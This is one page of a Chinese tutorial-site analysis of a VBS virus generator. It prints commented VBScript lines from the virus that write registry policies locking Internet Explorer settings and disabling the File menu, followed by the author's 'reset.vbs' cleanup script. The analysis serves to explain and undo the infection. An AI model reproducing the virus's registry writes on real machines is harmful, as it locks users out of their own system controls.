文章分类 | 推荐文章 | 最新文章 | 热点文章 | 最新软件 | 精品软件 | 下载排行 | 推荐下载 | 免费看大片 | WPS | 杀毒软件
清风网络
首 页 软件下载 网络学院 数码学院
QQ 电脑入门 游戏 操作系统 图形处理 办公软件 媒体动画 精文荟萃 工具软件 网络编程 程序开发 网络技术 认证考试 网站建设 文章专栏
当前位置:清风网络学院操作系统 木马病毒VBS病毒制造机v1.0 分析报告
精品推荐
特别推荐
·趋势:新反病毒技术亟待成熟
·病毒反抗杀毒软件主要手段
·文件关联型木马的特殊化查杀
·杀毒技巧系列:杀毒、防恶意代码、脚本病毒的不完全合集
·识别非法进程及手工杀毒技巧
·清除系统隐藏病毒文件全攻略
·轻松找到恶意网站中藏的病毒
·一个防止U盘病毒的小技巧
·AUTO病毒致杀软失效并下载病毒
·禁止让瑞星2008随机启动的绝招
·通过客户端上网流程发现是否挂马
·不是这么简单 揭秘网友十大杀毒误区
·江民病毒播报:小心针对QQ的木马病毒
·注意!明星激情照被黑客利用传毒
·AUTO病毒破坏杀软下载恶意程序
·防止木马的入侵 木马清除方法大萃集
·精心设置卡巴斯基 彻底加快杀毒速度
·资深网管浅谈ARP欺骗类病毒的防治思路
·不再怕电脑病毒 电脑中毒后的6招处理方法
·如何让你的U盘做到100%预防电脑病毒
热点TOP10
·QQ聊天记录偷窥和QQ视频欺骗
·俄罗斯杀毒软件大蜘蛛登陆中国
·警惕高危木马病毒 随意下载病毒窃密码
·Flash漏洞最新疫情:一周感染190万用户
·卡巴斯基2009 Beta版 初步试用感受
·卡巴斯基Kaspersky 6.0半年免费激活码
·连载:经典好文 专家解读APR病毒(二)
·灭毒有招 如何全面清除计算机病毒
·卡巴斯基6.0下载卡巴斯基6.0key激活码
·雅虎信使惊现安全漏洞
·迅雷5报称PP点点通含木马 下载须谨慎!
·趋势:新反病毒技术亟待成熟
·“艾妮”感染型病毒下载器的解决
·系统伤口下载器制造后门并下病毒
·防止病从口入 打造聪明型卡巴斯基
·瑞星杀毒软件2008网络版新品发布
·磁碟机与熊猫烧香病毒大比拼
·赤水牛开后门并破坏可执行程序
·网游帐号贪吃蛇盗窃诸多网游帐号
·计算机病毒总数年底突破100万个

VBS病毒制造机v1.0 分析报告
日期:2007年2月23日 作者:清风网络学院 查看:[大字体 中字体 小字体]

r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\AutoConfig",1,"REG_DWORD" '修改注册表,禁止更改自动配置
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage",1,"REG_DWORD" '修改注册表,禁止更改主页,即“主页”变灰
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\History",1,"REG_DWORD" '修改注册表,禁止更改历史记录设置
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Connwiz Admin Lock",1,"REG_DWORD" '修改注册表,禁止更改Internet连接向导
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\SecurityTab",1,"REG_DWORD" '修改注册表,禁止更改安全项
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\ResetWebSettings",1,"REG_DWORD" '修改注册表,禁止“重置web设置”
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource",1,"REG_DWORD" '修改注册表,禁止查看源文件
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions\NoAddingSubScriptions",1,"REG_DWORD" '修改注册表,禁止添加脱机计划
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu",1,"REG_DWORD" '修改注册表,禁止“文件”菜单

下面就是作者提供的“解药”--恢复文件reset.vbs的源代码:
(由于这里与上面的病毒破坏恶意修改恰好相反,故不做注释了)

Set fs=CreateObject("Scripting.FileSystemObject")
Set dir1=fs.GetSpecialFolder(0)
Set dir2=fs.GetSpecialFolder(1)
Set so=CreateObject("Scripting.FileSystemObject")
dim r
Set r=CreateObject("Wscript.Shell")
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\deltree.exe","start.exe /m deltree /y "&dir1&"\Win32system.vbs"
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\deltree.exe","start.exe /m deltree /y "&dir2&"\Win32system.vbs"
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\deltree.exe","start.exe /m deltree /y "&dir1&"\Start Menu\Programs\启动\Win32system.vbs"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",0,"REG_DWORD"

上一页 [1] [2] [3] [4] [5] 下一页 




上一篇:总结开3389的5种方法

下一篇:Linux中文件查找技术大全

VBS病毒制造机v1.0 分析报告 相关文章:
·BT下载速度变慢原因解读及应对方法分析
·万能五笔2001注册码分析及暴力破解 上
·静态分析技术-IDA Pro简介
·电脑死机的故障分析
·Ebook WorkShop制造电子书全攻略
·警惕高危木马病毒 随意下载病毒窃密码
·股票分析专家 同花顺2008功能概述
·Linux系统安全机制进阶分析
·域名注册的价值分析
·分析称主动防御安全技术尚存技术缺陷
VBS病毒制造机v1.0 分析报告 相关软件:
·“科多兽”病毒专杀工具 V3.6
·“征途木马”病毒专杀工具 V3.3
·金融炼金术:证券分析的逻辑
·中国富人报告
·建设部监理师-案例分析录音15
·04年中医执业医师试题分析
·2005年11月系统分析师考试试题分析
·2002年系统分析员级试题及答案
·3D 动画与建模:人体的综合与分析技术
·大学生暑假社会调查报告范文

特别声明:本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员,我们尽快予以更正。
[打印本页] [关闭窗口] 转载请注明来源:http://www.vipcn.net
| 帮助(?) | 版权声明 | 友情连接 | 关于我们 | 信息发布
Copyright 2007 www.vipcn.net All Rights Reserved. 鄂ICP备05000083号Powered by:viphot